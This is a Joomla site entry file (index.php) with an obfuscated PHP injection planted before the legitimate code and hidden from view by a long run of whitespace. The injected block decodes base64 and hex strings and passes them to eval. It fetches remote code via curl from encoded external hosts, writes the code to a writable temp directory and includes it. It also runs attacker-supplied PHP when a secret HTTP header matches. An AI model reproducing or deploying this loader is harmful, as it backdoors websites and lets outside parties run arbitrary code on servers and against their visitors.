<?php                                                                                                                                                                 /*versio:2.11*/$Q0QQ0=0;$GLOBALS['QQ0Q'] = '}Y3VybAf0~X2luaXQ08_!.%YWxsb3dfdXJsX2ZvcGVu@#7MQ!c0X3NldG9wdAX2V4ZWM03Xw2Y2xvc2U02)PGltZyBzcmM9Ig1{@3IiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4$5dw0eb3Nvbi5pbg_a3RpcHAuY2g}c2lsYmVyLmRl0f13WV88@Og1;%ZGlzcGxheV9lcnJvcnM^f{ZGV0ZXJtaW5hdG9y&ZnRw7^d2.Mi4xMQ6993%STFJbDExbGwxMWxsSTFs6YmFzZTY0X2VuY29kZQYmFzZTY0X2RlY29kZQ%!)aHR0cDovLwc,0SFRUUF9IT1NUf3cSFRUUF9VU0VSX0FHRU5Uc53dW5pb24d&{c2VsZWN09c0UkVRVUVTVF9VUkkU0NSSVBUX05BTUU!(UVVFUllfU1RSSU5HPw!20L3RtcC8}f0L3RtcAa19VE1Q!@0VEVNUAVE1QRElSdXBsb2FkX3RtcF9kaXI}(6;Lg^dmVyc2lvLQLXBocASFRUUF9FWEVDUEhQ^b3V0b%@%~b2s)aHR0cA1*2~Oi8vL3BnLnBocD91PQ_c3Jms9c0dJnQ9cGhwJnA9ddJnY96261736536345f6465636f6465';$Q0QQ0=pack('H*',substr($GLOBALS['QQ0Q'], -26));if (!function_exists('QOOQ0Q00')){function QOOQ0Q00($QQ, $Q0){$c=$GLOBALS['QQ0Q']; $d=pack('H*',substr($GLOBALS['QQ0Q'], -26)); return $d(substr($c, $QQ, $Q0));}};eval($Q0QQ0('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJElJSTFsbCl7ICRRMDAwT08gPSBRT09RMFEwMCgxLCA2KTsgJFFRME9RUSA9ICRRMDAwT08uUU9PUTBRMDAoMTAsIDcpOyBpZiAoQGluaV9nZXQoUU9PUTBRMDAoMjMsIDIwKSkgPT0gUU9PUTBRMDAoNDYsIDIpKSB7ICRRMFFPUVE9QGZpbGVfZ2V0X2NvbnRlbnRzKCRJSUkxbGwpOyByZXR1cm4gUU9PUTBRMDAoNTEsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRRUTBPUVEpKXsgJFEwUTAwMCA9IEAkUVEwT1FRKCk7ICRRME9RT1EgPSAkUTAwME9PLlFPT1EwUTAwKDUxLCAxMCk7ICRRMFEwT08gPSAkUTAwME9PLlFPT1EwUTAwKDYxLCA3KTsgJFEwTzAwTyA9ICRRMDAwT08uUU9PUTBRMDAoNzAsIDIpLlFPT1EwUTAwKDczLCA3KTsgQCRRME9RT1EoJFEwUTAwMCwgQ1VSTE9QVF9VUkwsICRJSUkxbGwpOyBAJFEwT1FPUSgkUTBRMDAwLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkUTBPUU9RKCRRMFEwMDAsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkUTBPUU9RKCRRMFEwMDAsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkUU9RT1EwID0gQCRRMFEwT08oJFEwUTAwMCkpIHtyZXR1cm4gUU9PUTBRMDAoNTEsIDApO30gQCRRME8wME8oJFEwUTAwMCk7IHJldHVybiBRT09RMFEwMCg1MSwgMCk7IH0gZWxzZSB7IHJldHVybiBRT09RMFEwMCg4MywgMTQpLiRJSUkxbGwuUU9PUTBRMDAoMTAxLCAzOSk7IH0gfSBmdW5jdGlvbiB1cGQoJFFRT08wMCwkSUlJMWxsKXsgJElsMWxsbD1AZm9wZW4oJFFRT08wMCxRT09RMFEwMCgxNDIsIDIpKTsgQGZjbG9zZSgkSWwxbGxsKTsgaWYgKEBpc19maWxlKCRRUU9PMDApKXt3cml0ZSgkUVFPTzAwLGdldGZpbGUoJElJSTFsbCkpO307IH0gZnVuY3Rpb24gd3JpdGUoJFFRT08wMCwkUTBRUU9PKXsgaWYgKCRRMDBRME89QGZvcGVuKCRRUU9PMDAsUU9PUTBRMDAoMTQyLCAyKSkpeyBAZndyaXRlKCRRMDBRME8sJFEwUVFPTyk7IEBmY2xvc2UoJFEwMFEwTyk7IH0gfSAkUTAwMDBRID0gQXJyYXkoUU9PUTBRMDAoMTQ2LCAxMCksIFFPT1EwUTAwKDE1NywgMTEpLCBRT09RMFEwMCgxNjksIDEyKSk7IGZ1bmN0aW9uIG91dHB1dCgkUTBPME9PLCAkUTBRT1EwKXsgZWNobyBRT09RMFEwMCgxODUsIDMpLiRRME8wT08uUU9PUTBRMDAoMTkwLCAyKS4kUTBRT1EwLiJcclxuIjsgfSBmdW5jdGlvbiBwYXJhbSgpeyByZXR1cm4gUU9PUTBRMDAoNTEsIDApOyB9IEBpbmlfc2V0KFFPT1EwUTAwKDE5NSwgMTkpLCAwKTsgZGVmaW5lKFFPT1EwUTAwKDIxNywgMTYpLCAxKTsgJFFRT09PTz1RT09RMFEwMCgyMzQsIDQpOyAkUTBRUU9RPVFPT1EwUTAwKDI0MywgNik7ICRRTzAwMDA9UU9PUTBRMDAoMjU0LCAyMCk7ICRRUTBPTzA9UU9PUTBRMDAoMjc1LCAxOCk7ICRJSTFsbDE9UU9PUTBRMDAoMjkzLCAxOCk7ICRJMTFJbGw9UU9PUTBRMDAoMzE0LCAxMCk7ICRJMTFJbGwuPXN0cnRvbG93ZXIoQCRfU0VSVkVSW1FPT1EwUTAwKDMyNywgMTIpXSk7ICRRUVFRUTAgPSBAJF9TRVJWRVJbUU9PUTBRMDAoMzQyLCAyMCldOyBmb3JlYWNoICgkX0dFVCBhcyAkUTBPME9PPT4kUTBRT1EwKXsgaWYgKHN0cnBvcygkUTBRT1EwLFFPT1EwUTAwKDM2NSwgNykpKXskX0dFVFskUTBPME9PXT1RT09RMFEwMCg1MSwgMCk7fSBlbHNlaWYgKHN0cnBvcygkUTBRT1EwLFFPT1EwUTAwKDM3NSwgOCkpKXskX0dFVFskUTBPME9PXT1RT09RMFEwMCg1MSwgMCk7fSB9IGlmKCFpc3NldCgkX1NFUlZFUltRT09RMFEwMCgzODYsIDE1KV0pKSB7ICRfU0VSVkVSW1FPT1EwUTAwKDM4NiwgMTUpXSA9ICRfU0VSVkVSW1FPT1EwUTAwKDQwMSwgMTUpXTsgaWYoJF9TRVJWRVJbUU9PUTBRMDAoNDE4LCAxNildKSB7ICRfU0VSVkVSW1FPT1EwUTAwKDM4NiwgMTUpXSAuPSBRT09RMFEwMCg0MzQsIDIpIC4gJF9TRVJWRVJbUU9PUTBRMDAoNDE4LCAxNildOyB9IH0gaWYgKCRJMUlJSUk9JEkxMUlsbC5AJF9TRVJWRVJbUU9PUTBRMDAoMzg2LCAxNSldKXsgJElsbGxsST1AbWQ1KCRJMTFJbGwuJFEwUVFPUS5QSFBfT1MuJFFPMDAwMCk7ICRJbElsbEk9UU9PUTBRMDAoNDM5LCA3KTsgJFFRMFEwMCA9IEFycmF5KFFPT1EwUTAwKDQ0OSwgNiksIEAkX1NFUlZFUltRT09RMFEwMCg0NTgsIDQpXSwgQCRfU0VSVkVSW1FPT1EwUTAwKDQ2NSwgNildLCBAJF9FTlZbUU9PUTBRMDAoNDU4LCA0KV0sIEAkX0VOVltRT09RMFEwMCg0NzEsIDgpXSwgQCRfRU5WW1FPT1EwUTAwKDQ2NSwgNildLCBAaW5pX2dldChRT09RMFEwMCg0NzksIDE5KSkpOyBmb3JlYWNoICgkUVEwUTAwIGFzICRJbGwxbDEpeyBpZiAoIWVtcHR5KCRJbGwxbDEpKXsgJElsbDFsMS49RElSRUNUT1JZX1NFUEFSQVRPUjsgaWYgKEBpc193cml0YWJsZSgkSWxsMWwxKSl7ICRJbElsbEkgPSAkSWxsMWwxOyBicmVhazsgfSB9IH0gJHRtcD0kSWxJbGxJLlFPT1EwUTAwKDUwMiwgMikuJElsbGxsSTsgaWYgKEAkX1NFUlZFUlsiSFRUUF9ZX0FVVEgiXT09JElsbGxsSSl7IGVjaG8gIlxyXG4iOyBAb3V0cHV0KFFPT1EwUTAwKDUwNSwgOCksICRRMFFRT1EuUU9PUTBRMDAoNTEzLCAyKS4kUVFPT09PLlFPT1EwUTAwKDUxNSwgNikpOyBpZiAoJElJbGwxMT0kSUkxbGwxKEAkX1NFUlZFUltRT09RMFEwMCg1MjEsIDE2KV0pKXtAZXZhbCgkSUlsbDExKTtlY2hvICJcclxuIjtvdXRwdXQoUU9PUTBRMDAoNTM4LCA0KSwgUU9PUTBRMDAoNTQ3LCAzKSk7fSBleGl0KDApOyB9IGlmIChAaXNfZmlsZSgkdG1wKSl7QGluY2x1ZGVfb25jZSgkdG1wKTt9IGVsc2V7ICRJMUlJSUk9QHVybGVuY29kZSgkSTFJSUlJKTsgdXBkKCR0bXAsUU9PUTBRMDAoNTUxLCA2KS5RT09RMFEwMCg1NjEsIDQpLiRRMDAwMFFbMF0uUU9PUTBRMDAoNTY1LCAxNCkuJEkxSUlJSS5RT09RMFEwMCg1ODIsIDQpLiRJbGxsbEkuUU9PUTBRMDAoNTg5LCAxMikuJFFRT09PTy5RT09RMFEwMCg2MDMsIDQpLiRRMFFRT1EpOyB9IH0gfQ=='));?><?php
/**
 * @package		Joomla.Site
 * @copyright	Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__) . '/defines.php')) {
	include_once dirname(__FILE__) . '/defines.php';
}

if (!defined('_JDEFINES')) {
	define('JPATH_BASE', dirname(__FILE__));
	require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app;
